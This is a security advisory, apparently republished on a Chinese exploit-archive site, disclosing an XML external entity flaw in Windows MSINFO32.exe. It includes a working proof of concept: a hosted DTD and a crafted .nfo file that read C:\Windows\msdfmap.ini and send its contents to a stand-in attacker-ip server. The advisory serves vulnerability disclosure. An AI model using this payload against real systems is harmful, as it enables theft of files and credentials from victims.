首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection
来源:http://hyp3rlinx.altervista.org 作者:hyp3rlinx 发布时间:2016-12-06  
[+] Credits: John Page aka hyp3rlinx
 
[+] Website: hyp3rlinx.altervista.org
 
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt
 
[+] ISR: ApparitionSec
 
 
 
Vendor:
=================
www.microsoft.com
 
 
 
Product:
==========================
Windows System Information
MSINFO32.exe v6.1.7601
 
 
Windows MSINFO32.EXE Displays a comprehensive view of your hardware, system
components, and software environment.
 
Parameters
FileName   : Specifies the file to be opened. This can be an .nfo, .xml, .txt, or .cab file.
 
 
 
Vulnerability Type:
===================
XML External Entity
 
 
 
CVE Reference:
==============
N/A
 
 
 
Vulnerability Details:
=====================
 
Microsoft Windows MSINFO32.exe is vulnerable to XML External Entity attack
which can potentially allow remote attackers to
gain access to and exfiltrate files from the victims computer if they open
a malicious ".nfo" file via remote share / USB etc.
 
Upon open the file user will see error message like "System Information is
unable to open this .nfo file. The file might
be corrupt etc..
 
 
Tested Windows 7 SP1
 
 
Exploit code(s):
===============
 
Access and exfiltrate Windows "msdfmap.ini" file as trivial POC.
This file contains credentials for MS ADO Remote Data Services.
 
 
1) python -m SimpleHTTPServer 8080 (runs on attacker-ip / hosts payload.dtd)
 
 
 
2) "payload.dtd"
 
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-ip:8080?%file;'>">
%all;
 
 
 
3) "FindMeThatBiatch.nfo" (corrupt .NFO file)
 
<?xml version="1.0"?>
<!DOCTYPE HYP3RLINX [
<!ENTITY % file SYSTEM "C:\Windows\msdfmap.ini">
<!ENTITY % dtd SYSTEM "http://attacker-ip:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
 
 
 
Double click to open FindMeThatBiatch.nfo, user gets error MSINFO32
opens... attacker gets files.
 
OR open via Windows CL:
c:\>msinfo32  \\REMOTE-SHARE\FindMeThatBiatch.nfo
 
 
 
Disclosure Timeline:
======================================
Vendor Notification: September 4, 2016
Vendor Reply "not meet the bar for security servicing": September 7, 2016
December 4, 2016  : Public Disclosure
 
 
 
 
Exploitation Technique:
=======================
Remote
 
 
 
Severity Level:
================
High
 
 
 
 
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
 
hyp3rlinx
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Event Viewer 1.0 - X
·Apache CouchDB 2.0.0 - Local P
·Alcatel Lucent Omnivista 8770
·NetCat 0.7.1 - Denial of Servi
·Microsoft Windows Media Center
·Dup Scout Enterprise 9.1.14 -
·Microsoft Excel Starter 2010 -
·DiskBoss Enterprise 7.4.28 - '
·Microsoft Authorization Manage
·Linux Kernel 4.4.0 (Ubuntu 14.
·BlackStratus LOGStorm 4.5.1.35
·Microsoft PowerShell - XML Ext
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved